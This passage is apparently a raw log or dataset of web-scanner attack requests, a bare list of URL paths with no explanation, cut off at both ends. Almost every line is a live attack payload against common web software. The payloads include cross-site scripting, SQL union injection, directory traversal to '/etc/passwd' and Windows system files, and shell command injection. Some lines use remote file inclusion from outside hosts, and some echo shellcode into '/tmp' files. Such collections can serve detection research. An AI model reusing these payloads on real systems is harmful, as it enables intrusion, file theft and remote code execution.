content=\"testylik=3403\">\n/scripts/index.php?show=/etc/passwd\n/main.php?logout=\"ver,>q59646442&rem,\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332008331\n/scriptblocking_service/\n/?<script>document.cookie=\"testpwew=1315;\"</script>\n/hipkz026.mscgi?<script>document.cookie=\"testyrbs=2855;\"</script>\n/scripts/index.php?id=823dwrvmfh'\n/phpmyadmin/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/javascript/zorum.exe\n/modules/forums/bb_smilies.php?bgcolor1=\\\"><script>alert('vulnerable')</script>\n/scripts/wx4z4gedhl0l.pl\n/examples/jsp/jsp2/jspxfaq.php?skin=../../admin/manager&tplpath=admin\n/uc3w3bdi.aspx?<script>document.cookie=\"testxllt=9940;\"</script>\n/weq93ppb.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/qhvu0pdg.jsp?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/ywaxntrx.kspx?<script>cross_site_scripting.nasl</script>\n/javascript/tiki.exe\n/yef5f3d5.php?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/javascript/stories.exe\n/6dlc2zm9.mscgi?<script>document.cookie=\"testqpux=4016;\"</script>\n/javascript/cron.exe\n/examples/servlets/servlet/faq.php?action=&type=view&s=&id=-1' union select 0,184558504,0,0,0,0,0--\n/w4996nr0.cfc?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/scripts/buoalakxhatu.php3\n/top.php?stuff=;uname\\x09>q51161767\\x09#\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/no4ghqiguzhst?\n/passwd-announce/\n/8t9v8k7x.cfm?<script>document.cookie=\"testhvje=9403;\"</script>\n/hjdzm96v.php3?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/y8pmygrp.x?<script>cross_site_scripting.nasl</script>\n/scgi-bin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/cgi-bin/index.php?id='union/**/select/**/0,0,1260750836,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/scripts/billing/billingmanager_income.asp\n/javascript/shops.exe\n<script>document.cookie=\"testpwew=1315;\"</script>\n/~/<script>alert('vulnerable')</script>.aspx\n/scripts/9pen4xzgztjn.php\n/subscriptions.rar\n/javascript/synapse.exe\n/examples/jsp/sessions/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||\n/zroo33l4.idc?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/9o6g5vkn.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/1qwv2p5p.html?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/examples/jsp/error/index.php?cid='\n/fc9t54l7.mscgi?<script>document.cookie=\"testggad=2000;\"</script>\n/en-us/9kr0ih0v.x?<script>document.cookie=\"testzgnm=1183;\"</script>\n//a=\"%3cscript%20src=%27http://www.example.com/test?rnd=q29825452%27%3e%3c%2fscript%3e\";document.writeln(unescape(a))\n/script/ident/loginmodif.php?path_inc=http://192.168.202.118:8080/ghl9il?\n/87_ben dover's cheek mates/\n/ows-bin/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/main.php?stuff='&uname >q14199491 #\n/cgi-bin/vpasswd.cgi\n/main.php?logout=&ver,>q24489971&rem,\n/script/plugins/phpgacl/admin/index.php?path_inc=http://192.168.202.118:8080/ghl9il?\n/newslettersubscription/\n/ap58k3ci.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-home/r.cgi?file=../../../../../../../../../../etc/passwd\n/scripts/qop0sa1auif9.php3\n/phpmyadmin/a1disp3.cgi?/../../../../../../etc/passwd\n/index.php?c=access&a=login&ref_c=nessus\"><script>alert(1074750072)</script>&ref_a=projectpier_login_page_xss.nasl\"><script>alert(377319680)</script>\n/en-us/account/search.php?searchstring=<script>foo</script>\n/rbec2ohx.php3?<script>cross_site_scripting.nasl</script>\n/help.php?q=\";rm\\x09q21654461\\x09#\n/uvazfs7p.jspa?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/scripts/piywzua5hwer.pl\n/scripts/index.php?op=default&date=200607' union select 1,1423223114,1,1,1,1,1,1,1,1--&blogid=1\n/scripts/index.php?kietu[url_hit]=http://xxxxxxxx/\n/o6ebbirj.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/install.php?newlang=../../cpg_error.log\\x00\n/scripts/index.php?board=nonexistant1474674258\n/scripts/viewpage.php?file=/etc/passwd\n/hjdzm96v.do?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/subscriptions.php\n/en-us/s7qus4g3.do?<script>cross_site_scripting.nasl</script>\n/o6ebbirj.html?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_57mxcga2]));die;/*\n/aaron's-autos/\n/fnwhrxyd.jsp?<script>cross_site_scripting.nasl</script>\n//<body><script src=http://www.example.com/test?rnd=q31494276></script>\n/rpxyx07v.php?<script>document.cookie=\"testbnli=1975;\"</script>\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/bin/echo+-en+\"\\0174\\0044\\0000\\0377\\0347\"+>>+/tmp/dhbiyrztiq0;').\"]=1\n/javascript/removal.exe\n/javascript/crons.exe\n/scripts/db4web_c.exe/dbdirname/c:\\boot.ini\n/comments.php?scriptpath=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+5b+e8+57+00+00+00+01+d3+5e+5a+5f+58+ff+e3+e8+ed+ff+ff+ff+7f+e9+f1+6f+57+69++>>ctdn\n/manager/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/i7prbs22.exe?<script>document.cookie=\"testjnre=7328;\"</script>\n/bn857frh.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/htgrep/file=index.html&hdr=/etc/passwd\n/examples/jsp/num/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/ydexw8by.jsp?<script>document.cookie=\"testulex=4996;\"</script>\n/phpmyadmin/al_initialize.php?alpath=/etc/passwd\\x00\n/subscriptions.mdb\n/examples/jsp/sessions/search/show.pl?url=file:/etc/passwd\n/main.php?logout='&rm q65442989 #\n/javascript/replica.exe\n/examples/servlets/servlet/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/script/menu/menuprincipal.php?path_inc=@rfiurl\n/main.php?logout=\"ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/examples/jsp/cal/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/en-us/n9xlumt5.cfc?<script>cross_site_scripting.nasl</script>\n<script>document.cookie=\"testylfu=1313;\"</script>\n/examples/jsp/cal/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/d5a5renl.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ddoworrl.pl?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/index.php?page=/etc/passwd\\x00\n/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1\n/javascript/document.7z\n<script>document.cookie=\"testydan=5106;\"</script>\n/usingascripttoaddadomainusertoalocalgroup/\n/scripts/vhost.php?action=logout&time=1331904195\n/javascript/reports.exe\n/ny1b3qq4.dll?<script>cross_site_scripting.nasl</script>\n/de3v2dd9.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/rv98iwjp.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-home/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc\n/javascript/premium.exe\n/javascript/misc.exe\n/javascript/usa.exe\n/bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../../etc/passwd\\x00\n/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332010414,1557267964 -- \n/help.php?q=&del;q31933452&rem;\n/howtoimportsubscriptions/\n/javascript/root.exe\n/script/tick/test.php?path_to_code=http://cirt.net/rfiinc.txt?\n/<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/javascript/piranha.exe\n/examples/jsp/error/search.jsp?q=%\"<script>alert(1331904374)</script>\n/5qnlm5z2.htm?<script>document.cookie=\"testsixi=8451;\"</script>\n/cgi-bin/webdist.cgi?distloc=;cat /etc/passwd\n/u95h6ymu.kspx?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/en-us/dda2qr7j.htm?<script>cross_site_scripting.nasl</script>\n/help.php?q='del\\x09q97653798\\x09#\n/en-us/esmozg5d.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vjbrrppi.asp?<script>cross_site_scripting.nasl</script>\n/javascript/server.exe\n/msadc/..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/script/common.inc.php?path_inc=http://cirt.net/rfiinc.txt?\n/0u75ldxq.mscgi?<script>cross_site_scripting.nasl</script>\n/xfkun1ku.aspx?<script>cross_site_scripting.nasl</script>\n/scripts/news.scr.php?globals[pth][classes]=http://192.168.202.118:8080/ghl9il??\n/t3af3tdz.kspx?<script>cross_site_scripting.nasl</script>\n/javascript/www3.exe\n/rpxyx07v.jsp?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/main.php?stuff=\"\\x0ddel q77128449 #\n/ybz5rz7a.kspx?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.96:8080/ipb5ri??\n/<script>document.cookie=\"testzgnm=1183;\"</script>\n/recordings/minis.php?month=../../../../../../etc/passwd\n/manager/index.php?id='union/**/select/**/0,0,1318083641,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/examples/jsp/jsp2/jspx/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/manager/index.php?id=urjhxcl19w'\n/view_user.php?list=1&letter=&sort_by='select\n/u8yiqilu.exe?<script>document.cookie=\"testswjp=6010;\"</script>\n/bash_script/\n/scripts/index.action\n/qczkquis.mscgi?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/xfkun1ku.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/o35zot2r.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/classes.exe\n/ny1b3qq4.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/jw64yq8u.mscgi?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/examples/jsp/cal/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/examples/servlets/servlet/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/examples/jsp/checkbox/listrec.pl?app=qmh-news&template=;ls /etc|\n/lsoix5h3.cgi?<script>cross_site_scripting.nasl</script>\n/i7prbs22.pl?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/cgis/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/javascript/png.exe\n/main.php?stuff=;uname\\x09>q56931967\\x09#\n/cgi-bin/search.jsp?q=%\"<script>alert(1331904660)</script>\n/subscriptions.jar\n/javascript/cfusion.exe\n/page.exe\n/main.php?stuff=del;q76531174&rem;\n/edv3mapy.cfc?<script>cross_site_scripting.nasl</script>\n/scripts/mapserv.exe?map=mapserver_detect.nasl.map\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"zj\\0003x\\0315\\0200xp1\\0322\\0262\\0377\\0266\\0377\\0001\\0320\" >> /tmp/vsnlklmgzu0;echo|awstats693389.txt\n/i686v90l.kspx?<script>document.cookie=\"testfutf=1550;\"</script>\n/cgi-bin/verify.asp?username='\n/examples/jsp/jsp2/el/index.php?templates_dir=/etc/passwd\\x00\n/en-us/n9xlumt5.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/phpmyadmin.exe\n/javascript/opengts.exe\n/javascript/document.fcgi\n/u8yiqilu.php?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/m4kkjf8l.cgi?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/scripts/ycqbbdpf.exe\n/<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/scripts/sources/functions.php?root_path=/etc/passwd\\x00\n/en-us/ddoworrl.pl?<script>document.cookie=\"testvlau=8517;\"</script>\n/dslpwt15.htm?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/q703m78q.html?<script>document.cookie=\"testvowq=604;\"</script>\n/top.php?stuff=\"ping\\x09-w\\x099000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/athenareg.php?pass= ;cat /etc/passwd\n/javascript/read.exe\n/scripts/1hactwocbsuo.sh\n/webdav/phprun.php?cmd=c:\\wce.exe -r\n/w4996nr0.exe?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/en-us/dda2qr7j.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=&del;q55714714&rem;\n/de3v2dd9.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/admin/admin.php\n/hipkz026.html?<script>document.cookie=\"testyrbs=2855;\"</script>\n/path_script/createurl.php?formurl=http://192.168.202.96:8080/ipb5ri?\n/nuh3zirz.cfm?<script>cross_site_scripting.nasl</script>\n/33y9gcqq.jspa?<script>document.cookie=\"testnvxc=4301;\"</script>\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\\x00\n/recordings/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/cacti/wiki.php/<script>foo</script>\n/examples/jsp/error/shoutbox.php?conf=../\n/main.php?stuff=\";rm\\x09q74362376\\x09#\n/en-us/ddoworrl.exe?<script>document.cookie=\"testvlau=8517;\"</script>\n/script_peardb/\n/script/ident/disconnect.php?path_inc=http://192.168.202.118:8080/ghl9il?\n/main.php?stuff=\"ping\\x09-w\\x0911000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/burning cd-r's/\n/scripts/qowmcdks.exe\n/manager/cwmail.exe\n/cgi-bin/sources/functions.php?root_path=/etc/passwd\\x00\n/raanw4ia.cgi?<script>cross_site_scripting.nasl</script>\n/0qhcnefz.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/log/nether-log.pl?checkit\n/script/ident/loginmodif.php?path_inc=http://cirt.net/rfiinc.txt?\n/help.php?q=\"\\x0adel\\x09q76195479\\x09#\n/bn857frh.fts?<script>cross_site_scripting.nasl</script>\n/cacti/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/examples/jsp/num/minis.php?month=../../../../../../etc/passwd\n/de3v2dd9.x?<script>cross_site_scripting.nasl</script>\n/ju0u7kfo.kspx?<script>cross_site_scripting.nasl</script>\n/miz4r5hz.kspx?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/scripts/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/p043snfr.pl?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,003352643884,4,5,6,7,8,9,10,11--\n/manager/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/fcgi-bin/texis.exe/junk\n/en-us/9kr0ih0v.kspx?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/7uz3ok60.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/phpmyadmin/index.php?post=../config/password\n/esmozg5d.aspx?<script>cross_site_scripting.nasl</script>\n/javascript/suite.exe\n/ows-bin/gwweb.exe?help=bad-request\n/includes/tellafriend.php?about=game&gamename=<script>alert(411646083443);</script>\n/en-us/i686v90l.dll?<script>document.cookie=\"testfutf=1550;\"</script>\n/scripts/onwkbtts3uj1.cfm\n/en-us/hipkz026.exe?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/admin/index.php?path_to_script=http://192.168.202.118:8080/tzhfyzkbomspvm??&cmd=ls\n/h21y8w52.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/weq93ppb.cfc?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/search.jsp?q=%\"<script>alert(1331904373)</script>\n/manager/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/scripts/message/message_dialog.tml?how_many_back=\\\"><script>alert(1)</script>\n/scripts/www/delivery/ac.php?bannerid=-610+or+1=1\n/cgi-bin/index.php?templates_dir=/etc/passwd\\x00\n/en-us/account/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/examples/jsp/jsp2/el/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/d7ktpmcq.nsf?<script>cross_site_scripting.nasl</script>\n/javascript/hide.exe\n/ddoworrl.php3?<script>document.cookie=\"testvlau=8517;\"</script>\n/n9xlumt5.cgi?<script>cross_site_scripting.nasl</script>\n/egaet53a.cfm?<script>cross_site_scripting.nasl</script>\n/\"real+estate\"/\n/i686v90l.idc?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/l4fz1dqw.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/w4996nr0.mscgi?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/zuihld5m.cgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/newsscript.pl?mode=admin\n/javascript/flow.exe\n/scripts/admin/cal_login.php\n/cgi-bin/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/cgi-bin/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/en-us/jnv890lt.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,830002278,0,0,0,0,0--\n/examples/jsp/colors/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/main.php?logout=&rm;q42123677&rem;\n/eg2u8pbv.dll?<script>cross_site_scripting.nasl</script>\n/main.php?logout=uname >q97855547 #\n/en-us/account/starnet/addons/slideshow_full.php?album_name='1240931377\n/i686v90l.pl?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/index.php?template=../../../loudblog/custom/config.php\\x00\n/<script>cross_site_scripting.nasl</script>.pl\n/javascript/migrated.exe\n/3hlysl2x.do?<script>document.cookie=\"testgjbe=8505;\"</script>\n/byrg33fw.dll?<script>document.cookie=\"testexuu=5340;\"</script>\n/weq93ppb.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/i686v90l.cfm?<script>document.cookie=\"testfutf=1550;\"</script>\n/m4kkjf8l.cgi?<script>document.cookie=\"testyglc=8988;\"</script>\n/scripts/www/delivery/ac.php?bannerid=-787+or+1=1\n/nyvbv05h.do?<script>document.cookie=\"testftxz=5980;\"</script>\n/scripts/nryr3lvrjnwx.php3\n/help.php?q='|sleep 10 #\n/javascript/toolkit.exe\n/a0imiuf1.aspx?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/help.php?q=\"del\\x0cq49751234&rem\\x0c\n/de3v2dd9.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/606wkcop.asp?<script>cross_site_scripting.nasl</script>\n/comments.php?scriptpath=@rfiurl?scriptpath=@rfiurl?\n/examples/jsp/num/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/jw64yq8u.do?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/iv5vkgam.cfc?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file&currentfolder=/fckeditor_currentfolder_file_upload-1331905254.php.\n/u95h6ymu.x?<script>document.cookie=\"testkhwc=4028;\"</script>\n/scripts/www/delivery/ac.php?bannerid=-302+or+1=1\n/m4kkjf8l.php3?<script>document.cookie=\"testyglc=8988;\"</script>\n/cgi/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/i've shifted some donated artscene stuff to artscene/\n/cgi-bin/www/delivery/ac.php?bannerid=-1331919146+or+1=1+--+';passthru(base64_decode($_server[http_nessus_oxjf6sek]));die;/*\n/cgi-bin/cmd.exe?/c+dir\n/en-us/h5sc3gxy.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/7o5qp766.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/n9xlumt5.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331923197',null,null,null,null --\n/phpmyadmin/pfdispaly.cgi?../../../../../../etc/passwd\n/i2n4v4rl.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/cgi.cgi/ppdscgi.exe\n/cacti/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/xfkun1ku.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/real.exe\n/javascript/.passwd.properties\n/lmw4r201.cgi?<script>document.cookie=\"testwews=8477;\"</script>\n/en-us/account/index.php?string='\n/l13b77e5.htm?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/examples/jsp/jsp2/el/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/t7tm4m0b.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n<script>document.cookie=\"testxagh=6987;\"</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+8b+48+04+01+d1+89+4d+fc+8b+78+08+8b+40+0c+01+d0+01+d7+89+45+f8+73+27+60+8b++>>esbq\n/7dbjwpw6.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/nsn/..\\util/glist.bas\n/de3v2dd9.cfm?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\n/subscriptionsite/\n/scripts/piywzua5hwer.cfm\n/?<script>document.cookie=\"testkogj=3979;\"</script>\n/eg2u8pbv.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/922_tony hawk's american wasteland/\n/netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>\n/examples/jsp/num/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+1a00+>>esbq\n/manager/index.php?entry='\n/addvip.php?msetstr[\"progsdir\"]=http://192.168.202.96:8080/whmch8ftkt7kv?\n/javascript/axis.exe\n/examples/servlets/servlet/home/search.asp?nchannel='1\n/9kr0ih0v.html?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/javascript/updated.exe\n/help.php?q=\"\\x0drm q44862556 #\n/b4vng02k.fts?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/pxagj7n7.html?<script>cross_site_scripting.nasl</script>\n/scripts/event_view.php?eid=34 union select 1982082250\n/scripts/index.php?id=kis0atfdu6'\n/bxnyrhmh.htm?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/aj3pf49c.do?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/en-us/account/htsearch?exclude=`/etc/passwd`\n/fmnveedu.asp?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/gepi/gestion/savebackup.php?filename=http://192.168.202.118:8080/moclyxlwqyfjnp?&cmd=cat/etc/passwd\n/esmozg5d.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/6dlc2zm9.fts?<script>document.cookie=\"testqpux=4016;\"</script>\n/main.php?stuff='|sleep\\x0911\\x09#\n/scripts/config.php?returnpath=/etc/passwd\\x00\n/gumpscripts/\n/phpmyadmin/includes/config.php?relative_script_path=http://xxxxxxx\n/en-us/9kr0ih0v.cfm?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/<meta http-equiv=set-cookie content=\"testwews=8477\">\n/j734qobz.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/w04ukbv54ixz.sh\n/rv98iwjp.x?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&rm\\xa0q55891755&rem\\xa0\n/ht8pn8uq.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/wa.exe?debug-show-version\n/how_to.../\n/examples/jsp/sessions/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/examples/jsp/num/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/bxnyrhmh.mscgi?<script>document.cookie=\"testmjct=1867;\"</script>\n/phpmyadmin/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/jspx/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/appserver.exe/\n/cacti/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/d765w06j.fts?<script>cross_site_scripting.nasl</script>\n/en-us/w4996nr0.php?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+00+00+00+00+00+30+00+00+70+00+00+00+00+00+00+00+00+00+00+00++>>esbq\n/examples/jsp/jsp2/el/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||\n/millscript-vfs/\n/fxm.exe\n/uvazfs7p.kspx?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/cgi-bin/index.php?src=1&_common=1&time=1332009308&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/scripts/pm/add_ons/mail_this_entry/mail_authocheck.php?pm_path=http://xxxxxxxx./&sfx=.txt\n/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/llumt7msyau5y?\n/phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1<foo>bar</ foo>\n/examples/jsp/jsp2/elfaq.php?skin=../../admin/manager&tplpath=admin\n/vac1l5vm.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-914/htimage.exe/path/filename?2,2\n/cacti/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/javascript/.passwd.js\n/rbec2ohx.cfc?<script>cross_site_scripting.nasl</script>\n/scripts/ylrvly9nh_pf.html\n/examples/jsp/error/starnet/addons/slideshow_full.php?album_name='273385930\n/confirmunsubscription.php?output=http://cirt.net/rfiinc.txt?\n/scriptableinpython/\n/jnt3f86c.kspx?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/y8pmygrp.asp?<script>cross_site_scripting.nasl</script>\n/d5a5renl.jspa?<script>cross_site_scripting.nasl</script>\n/en-us/account/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/examples/jsp/sessions/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- \n/main.php?stuff=\"del\\x09q84368944\\x09#\n/login_up.php3?login_name=x&passwd=x&locale_id=../../../../../../../../../../../../boot.ini\\x00.jpg\n/fnwhrxyd.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/dslpwt15.exe?<script>document.cookie=\"testtkio=5454;\"</script>\n/examples/jsp/cal/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/examples/jsp/colors/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/en-us/oie504mr.htm?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/nyjgaorz.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/a1xss4e81e93yp/\n/oie504mr.x?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/main.php?stuff=\"&ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;/tmp/fppatbfqdp;\"\n/8x6w469u.cgi?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/examples/servlets/servlet/forumdisplay.php?fid=21\"><script>x</script>\n/script/menu/menuadministration.php?path_inc=@rfiurl\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008322&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/quikmail/nph-emumail.cgi?type=../\\x00\n/javascript/dock.exe\n/scripts/bveygnpo6hkw.asp\n/\"united+kingdom\"/\n/scripts/faq.php?action=&type=view&s=&id=-1' union select 